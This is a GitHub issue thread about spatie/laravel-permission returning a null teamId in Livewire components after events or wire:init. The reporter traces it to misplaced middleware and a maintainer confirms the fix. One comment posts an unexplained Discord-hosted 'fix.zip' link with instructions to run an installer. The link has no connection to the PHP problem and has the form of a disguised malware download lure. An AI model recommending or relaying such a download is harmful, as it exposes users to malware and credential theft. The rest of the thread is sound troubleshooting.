### ISSUE TITLE
Livewire: teamId is null after a emit/dispatch or wire:init.

### ISSUE THREAD

**Issue by vdlindenmark** [spatie/laravel-permission#2715]
### Description

We are using the following versions:

Laravel 11.21
Livewire 3.5
Spatie Laravel Permission 6.9
Spatie Laravel Permissions WITH TEAMS

**The issue**
I'm encountering an issue where the teamId is null after a dispatch/emit in Livewire components. This results in checking for permissions returning wrong values (like i'm having no permissions at all).

### Steps To Reproduce

1. Create a Laravel app with Livewire, spatie permissions and teams
2. Create a Livewire page, and a Livewire component and use the component inside the page.
3. Add a button to the Livewire component which is only enabled for a specific permission
4. dispatch a event inside the page, which is listening to inside the component https://livewire.laravel.com/docs/events 
5. The button will now always be disabled, even if you have the permissions. Add a ray(getPermissionsTeamId()) and it will return null...

Another way:
1. same as above
2. Create a Livewire page with a public function which logs the teamId
3. Log the teamId inside the render function, it will be set.
4. Trigger the function inside the blade of the page  <div wire:init="functionName">
5. The teamId will be null
...

### Version of spatie/laravel-permission package:

6.9

### Version of laravel/framework package:

11.21

### PHP version:

8.2

**Comment by Limxxx** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by drbyte** [comment]
Is the session being lost?

**Comment by vdlindenmark** [comment]
No, other pages are still aware of the teamId, just that specific component lost it after a dispatch/emit or wire:init. Lost like, getPermissionsTeamId() is returning null

**Comment by vdlindenmark** [comment]
Looks like it has something to do with a `livewire/update` call I'm seeing in my console (`sail up`).

For example:
`<button wire:click="save"  @cannot('update', $vacancy) disabled @endcannot>{{ __('Save') }}</button>`

The button is not disabled, so the user has permissions to update a vacancy, but if I check the permissions inside the save function with `auth()->user()->cannot('update', $this->vacancy)` it is false, logging the teamId results in null 🙃

**Comment by parallels999** [comment]
>`@cannot('update', $vacancy)`

- Maybe related with #2526 ??

**Comment by vdlindenmark** [comment]
I finally figured it out. My middleware was wrongly placed. In my own words: It was after the navigation but before the liveware update, or something. So a Livewire update did not know the teamId. Thanks for thinking along!

**Comment by drbyte** [comment]
Yes, that fully makes sense. Thanks for posting back the solution.
